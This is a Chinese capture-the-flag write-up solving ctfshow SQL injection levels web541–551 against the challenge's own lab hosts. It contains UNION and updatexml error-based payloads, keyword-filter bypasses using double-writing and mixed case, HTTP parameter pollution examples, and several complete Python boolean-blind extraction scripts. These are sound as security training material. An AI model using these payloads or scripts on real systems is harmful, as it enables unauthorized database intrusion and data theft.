ctfshow sqli-libs web541--web551

web541

在这里插入图片描述

and 和 or 被替换为空(直接删除,而不是替换成空格):从下面 infoorrmation_schema 过滤后能还原成 information_schema 可以看出是删除,否则双写就接不上了
# 还有   1'   也是不能生效的
?id=-1' union select 1,2,3--+
双写绕过:过滤只做一次替换,把 or 写成 oorr(information 写成 infoorrmation),中间的 or 被删掉后正好还原成原来的关键字
?id=-1' union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags

?id=-1' union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s

?id=-1' union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web542

?id=-1 union select 1,2,3--+
这题 id 是数字型,不需要引号闭合,直接 -1 union select 即可

库表结构和上题一样,payload 只需把闭合方式改成数字型即可
?id=-1 union select 1,(select group_concat(table_name) from infoorrmation_schema.tables where table_schema='ctfshow'),3 --+
flags

?id=-1 union select 1,(select group_concat(column_name) from infoorrmation_schema.columns where table_name='flags'),3 --+
id,flag4s

?id=-1 union select 1,(select group_concat(flag4s) from ctfshow.flags),3 --+

web543

在这里插入图片描述

union 查询这里绕不过去(试了很多写法都不行),那就改用 updatexml 报错注入

用 || 代替被过滤的 or 来拼接条件:
?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(schema_name))from(infoorrmation_schema.schemata))),3)||'1'='1

闭合方式和 ctfshow 的第一道 SQL 题类似,后端语句大概是单引号闭合的形式(原句记不清,凭 payload 推测):

select ... where id='$_GET[id]'

所以 payload 开头用 -1' 闭合引号,末尾再用 ||'1'='1 把引号补回去

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='ctfshow'))),3)||'1'='1
XPATH syntax error: '=flags'

?id=-1'||updatexml(1,concat(0x3d,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='flags'))),3)||'1'='1
XPATH syntax error: '=id,flag4s'

?id=-1'||updatexml(1,concat(0x3d,(select(flag4s)from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=ctfshow{2bcd1fdb-18f9-480c-a837'

updatexml 的报错信息最多只回显 32 个字符(上面恰好是 "=" 加 31 个字符),flag 被截断了,再用 right(flag4s,14) 取出剩下的部分:
?id=-1'||updatexml(1,concat(0x3d,(select(right(flag4s,14))from(ctfshow.flags))),3)||'1'='1
XPATH syntax error: '=-3c13e46487d4}'

web544

在这里插入图片描述
在这里插入图片描述

布尔盲注
注意 payload 末尾必须写 ||'0:整体是 1' and (条件) || '0,只有条件为真时才有回显;如果写成 ||'1,则 or '1' 恒真,页面永远有回显,无法区分条件真假
在这里插入图片描述

?id=1'aandnd(if(ascii(substr(database(),1,1))=115,1,0))||'0

按上面的 payload 写脚本即可
注意 information_schema 里的 or 也要双写成 infoorrmation_schema,另外嵌套括号很容易不配对,写的时候要仔细数

import requests

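# Boolean-based blind extraction for ctfshow web544.
#
# The filter deletes "and"/"or", so the keywords are double-written
# ("aandnd", "infoorrmation_schema") and survive one pass of the filter.
# The injected clause is  1' and (if(cond,1,0)) || '0 ; the trailing '0 must
# stay 0, otherwise "or '1'" makes the WHERE clause always true and the page
# no longer depends on cond.
#
# Run one STAGE at a time (database -> schemas -> tables -> columns -> flag);
# the recovered value is printed after every character.  BASE_URL is the
# per-instance challenge host and differs for every deployment.

BASE_URL = "https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/"
# Substring present in the page only when the injected condition is true.
MARKER = "Dumb"
# Seconds per request; the original call had no timeout and could hang forever.
TIMEOUT = 10

# {pos} is the 1-based character index, {mid} the ASCII threshold under test.
PAYLOADS = {
    "database": "1'aandnd(if(ascii(substr((database()),{pos},1))>{mid},1,0))||'0",
    "schemas": "1'aandnd(if(ascii(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{pos},1))>{mid},1,0))||'0",
    "tables": "1'aandnd(if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{pos},1))>{mid},1,0))||'0",
    "columns": "1'aandnd(if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{pos},1))>{mid},1,0))||'0",
    "flag": "1'aandnd(if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{pos},1))>{mid},1,0))||'0",
}
STAGE = "flag"


def search_char(oracle, pos, low=0, high=127):
    """Binary-search the ASCII code of the character at 1-based *pos*.

    *oracle(pos, mid)* must return True exactly when ascii(char at pos) > mid.
    Returns the code, or *low* (0) once *pos* is past the end of the string:
    MySQL substr() then yields '' and ascii('') is 0, so every comparison is
    false.  Starting at 0 instead of 32 means a space (32) is extracted
    instead of being mistaken for end-of-string.  Assumes ASCII output;
    a multi-byte character would be reported as its clamped first byte.
    """
    while low < high:
        mid = (low + high) // 2
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


def dump(oracle):
    """Yield the extracted characters one at a time until end-of-string (code 0)."""
    pos = 0
    while True:
        pos += 1
        code = search_char(oracle, pos)
        if code == 0:
            return
        yield chr(code)


def main():
    """Extract the selected STAGE and print the partial result after each character."""
    # One session reuses the TLS connection across the ~7 requests per character.
    session = requests.Session()

    def oracle(pos, mid):
        url = BASE_URL + "?id=" + PAYLOADS[STAGE].format(pos=pos, mid=mid)
        return MARKER in session.get(url, timeout=TIMEOUT).text

    flag = ""
    for ch in dump(oracle):
        flag += ch
        print(flag)


if __name__ == "__main__":
    main()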

web545

在这里插入图片描述

在这里插入图片描述
大小写混写和双写绕过都可以(脚本里 select 写成 SElect,information_schema 写成 infoorrmation_schema)

import requests

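# Boolean-based blind extraction for ctfshow web545.
#
# Both case-mixing ("SElect") and double-writing ("infoorrmation_schema")
# get past the filter here.  The injected clause is  0' || (if(cond,1,0)) || '0 ,
# which is true only when cond is true; the trailing '0 must stay 0.
#
# Run one STAGE at a time (database -> schemas -> tables -> columns -> flag);
# the recovered value is printed after every character.  BASE_URL is the
# per-instance challenge host and differs for every deployment.

BASE_URL = "https://cd991fbf-b4aa-4cda-b583-d8863dff54c7.challenge.ctf.show/"
# Substring present in the page only when the injected condition is true.
MARKER = "Dumb"
# Seconds per request; the original call had no timeout and could hang forever.
TIMEOUT = 10

# {pos} is the 1-based character index, {mid} the ASCII threshold under test.
PAYLOADS = {
    "database": "0'||(if(ascii(substr((database()),{pos},1))>{mid},1,0))||'0",
    "schemas": "0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{pos},1))>{mid},1,0))||'0",
    "tables": "0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{pos},1))>{mid},1,0))||'0",
    "columns": "0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{pos},1))>{mid},1,0))||'0",
    "flag": "0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{pos},1))>{mid},1,0))||'0",
}
STAGE = "flag"


def search_char(oracle, pos, low=0, high=127):
    """Binary-search the ASCII code of the character at 1-based *pos*.

    *oracle(pos, mid)* must return True exactly when ascii(char at pos) > mid.
    Returns the code, or *low* (0) once *pos* is past the end of the string:
    MySQL substr() then yields '' and ascii('') is 0, so every comparison is
    false.  Starting at 0 instead of 32 means a space (32) is extracted
    instead of being mistaken for end-of-string.  Assumes ASCII output.
    """
    while low < high:
        mid = (low + high) // 2
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


def dump(oracle):
    """Yield the extracted characters one at a time until end-of-string (code 0)."""
    pos = 0
    while True:
        pos += 1
        code = search_char(oracle, pos)
        if code == 0:
            return
        yield chr(code)


def main():
    """Extract the selected STAGE and print the partial result after each character."""
    # One session reuses the TLS connection across the ~7 requests per character.
    session = requests.Session()

    def oracle(pos, mid):
        url = BASE_URL + "?id=" + PAYLOADS[STAGE].format(pos=pos, mid=mid)
        return MARKER in session.get(url, timeout=TIMEOUT).text

    flag = ""
    for ch in dump(oracle):
        flag += ch
        print(flag)


if __name__ == "__main__":
    main()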

web546

把闭合换成双引号即可。注意 Python 字符串本身的引号:payload 里同时有 " 和 '(table_schema='ctfshow'),用单引号包裹的 f-string 会在 'ctfshow' 处提前结束,需要转义或换一种写法

import requests

flag = ""
i = 0

while True:
    i += 1
    low = 32
    high = 127

    while low < high:
        mid = (high + low) // 2
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((database()),{i},1))>{mid},1,0))||"0'
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{i},1))>{mid},1,0))||"0'
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{i},1))>{mid},1,0))||"0'
        #url = f'https://d89f8ea0-19d1-42ea-b6a1-d030b8e47a01.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{i},1))>{mid},1,0))||"0'
        url = f'https://2c00bae5-d8ec-40fb-9d48-97bd83f16e00.challenge.ctf.show/?id=0"||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{i},1))>{mid},1,0))||"0'

        r = requests.get(url=url)
        if 'Dumb' in r.text:
            low = mid + 1
        else:
            high = mid

    if low != 32:
        flag += chr(low)
    else:
        break
    print(flag)

web547

在这里插入图片描述
在这里插入图片描述
看图:?id=0'||(0)||'0 和 ?id=0'||(1)||'0 的回显不同,说明可以布尔盲注,直接上脚本

import requests

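# Boolean-based blind extraction for ctfshow web547.
#
# The two probes  0'||(0)||'0  and  0'||(1)||'0  give different pages, so the
# injected clause  0' || (if(cond,1,0)) || '0  works as a boolean oracle.
# Payloads are the web545 ones (case-mixed "SElect", double-written
# "infoorrmation_schema"); the page notes the or double-write is not
# actually required on this level, but it does no harm.
#
# Run one STAGE at a time (database -> schemas -> tables -> columns -> flag);
# the recovered value is printed after every character.  BASE_URL is the
# per-instance challenge host and differs for every deployment.

BASE_URL = "https://5352a93c-678c-4cf0-b68e-4a3aaa9d5ca9.challenge.ctf.show/"
# Substring present in the page only when the injected condition is true.
MARKER = "Dumb"
# Seconds per request; the original call had no timeout and could hang forever.
TIMEOUT = 10

# {pos} is the 1-based character index, {mid} the ASCII threshold under test.
PAYLOADS = {
    "database": "0'||(if(ascii(substr((database()),{pos},1))>{mid},1,0))||'0",
    "schemas": "0'||(if(ascii(substr((SElect(group_concat(schema_name))from(infoorrmation_schema.schemata)),{pos},1))>{mid},1,0))||'0",
    "tables": "0'||(if(ascii(substr((SElect(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{pos},1))>{mid},1,0))||'0",
    "columns": "0'||(if(ascii(substr((SElect(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{pos},1))>{mid},1,0))||'0",
    "flag": "0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{pos},1))>{mid},1,0))||'0",
}
STAGE = "flag"


def search_char(oracle, pos, low=0, high=127):
    """Binary-search the ASCII code of the character at 1-based *pos*.

    *oracle(pos, mid)* must return True exactly when ascii(char at pos) > mid.
    Returns the code, or *low* (0) once *pos* is past the end of the string:
    MySQL substr() then yields '' and ascii('') is 0, so every comparison is
    false.  Starting at 0 instead of 32 means a space (32) is extracted
    instead of being mistaken for end-of-string.  Assumes ASCII output.
    """
    while low < high:
        mid = (low + high) // 2
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


def dump(oracle):
    """Yield the extracted characters one at a time until end-of-string (code 0)."""
    pos = 0
    while True:
        pos += 1
        code = search_char(oracle, pos)
        if code == 0:
            return
        yield chr(code)


def main():
    """Extract the selected STAGE and print the partial result after each character."""
    # One session reuses the TLS connection across the ~7 requests per character.
    session = requests.Session()

    def oracle(pos, mid):
        url = BASE_URL + "?id=" + PAYLOADS[STAGE].format(pos=pos, mid=mid)
        return MARKER in session.get(url, timeout=TIMEOUT).text

    flag = ""
    for ch in dump(oracle):
        flag += ch
        print(flag)


if __name__ == "__main__":
    main()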

做完 548 回头看,这题其实不需要绕 or,所以用下一题的脚本也可以

web548

和上题基本一样,区别是 or 不再被过滤了,information_schema 可以直接写,不用双写

?id=0'||(0)||'0
?id=0'||(1)||'0

在这里插入图片描述

import requests

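# Boolean-based blind extraction for ctfshow web548.
#
# Same oracle as web547 ( 0' || (if(cond,1,0)) || '0 ), but "or" is no longer
# filtered on this level, so information_schema is written plainly; only the
# case-mixed "Select"/"SElect" is kept.
#
# Run one STAGE at a time (database -> schemas -> tables -> columns -> flag);
# the recovered value is printed after every character.  BASE_URL is the
# per-instance challenge host and differs for every deployment.

BASE_URL = "https://c04c1502-e1f3-498d-9fd8-d6683ae81cf1.challenge.ctf.show/"
# Substring present in the page only when the injected condition is true.
MARKER = "Dumb"
# Seconds per request; the original call had no timeout and could hang forever.
TIMEOUT = 10

# {pos} is the 1-based character index, {mid} the ASCII threshold under test.
PAYLOADS = {
    "database": "0'||(if(ascii(substr((database()),{pos},1))>{mid},1,0))||'0",
    "schemas": "0'||(if(ascii(substr((Select(group_concat(schema_name))from(information_schema.schemata)),{pos},1))>{mid},1,0))||'0",
    "tables": "0'||(if(ascii(substr((SElect(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctfshow'),{pos},1))>{mid},1,0))||'0",
    "columns": "0'||(if(ascii(substr((SElect(group_concat(column_name))from(information_schema.columns)where(table_name)='flags'),{pos},1))>{mid},1,0))||'0",
    "flag": "0'||(if(ascii(substr((SElect(group_concat(flag4s))from(ctfshow.flags)),{pos},1))>{mid},1,0))||'0",
}
STAGE = "flag"


def search_char(oracle, pos, low=0, high=127):
    """Binary-search the ASCII code of the character at 1-based *pos*.

    *oracle(pos, mid)* must return True exactly when ascii(char at pos) > mid.
    Returns the code, or *low* (0) once *pos* is past the end of the string:
    MySQL substr() then yields '' and ascii('') is 0, so every comparison is
    false.  Starting at 0 instead of 32 means a space (32) is extracted
    instead of being mistaken for end-of-string.  Assumes ASCII output.
    """
    while low < high:
        mid = (low + high) // 2
        if oracle(pos, mid):
            low = mid + 1
        else:
            high = mid
    return low


def dump(oracle):
    """Yield the extracted characters one at a time until end-of-string (code 0)."""
    pos = 0
    while True:
        pos += 1
        code = search_char(oracle, pos)
        if code == 0:
            return
        yield chr(code)


def main():
    """Extract the selected STAGE and print the partial result after each character."""
    # One session reuses the TLS connection across the ~7 requests per character.
    session = requests.Session()

    def oracle(pos, mid):
        url = BASE_URL + "?id=" + PAYLOADS[STAGE].format(pos=pos, mid=mid)
        return MARKER in session.get(url, timeout=TIMEOUT).text

    flag = ""
    for ch in dump(oracle):
        flag += ch
        print(flag)


if __name__ == "__main__":
    main()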

web549

?id=1&id=-1'union select 1,2,3--+

?id=1&id=-1'union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

这里的知识点是 HPP(HTTP Parameter Pollution,HTTP 参数污染)。
服务器端分两层:前面是以 tomcat 为引擎的 jsp 服务(负责参数检查),后面是以 apache 为引擎的 php 服务,真正提供 web 业务的是 php 服务。

请求流程:client 先访问到 tomcat,tomcat 再向 apache 请求数据;响应按相反的路径返回。
在这里插入图片描述
在这里插入图片描述

从截图可以看出:
前端的 tomcat(jsp)只取第一个 id 参数来做检查(实验中只验证到了这一点),所以 ?id=1 能通过检查;
在这里插入图片描述
在这里插入图片描述
而后端的 apache(php)对同名参数只取最后一个(PHP 的 $_GET 遇到重复参数时后面的值会覆盖前面的),真正进入 SQL 的是第二个 id,于是可以利用这个解析差异污染参数。这也说明前置检查(WAF/网关)和后端对参数的解析方式必须一致,否则检查会被绕过。

web550

双引号闭合即可

?id=1&id=-1"union select 1,(select group_concat(flag4s) from ctfshow.flags),3--+

web551

?id=1&id=-1") union select 1,(select group_concat(flag4s)from ctfshow.flags),3--+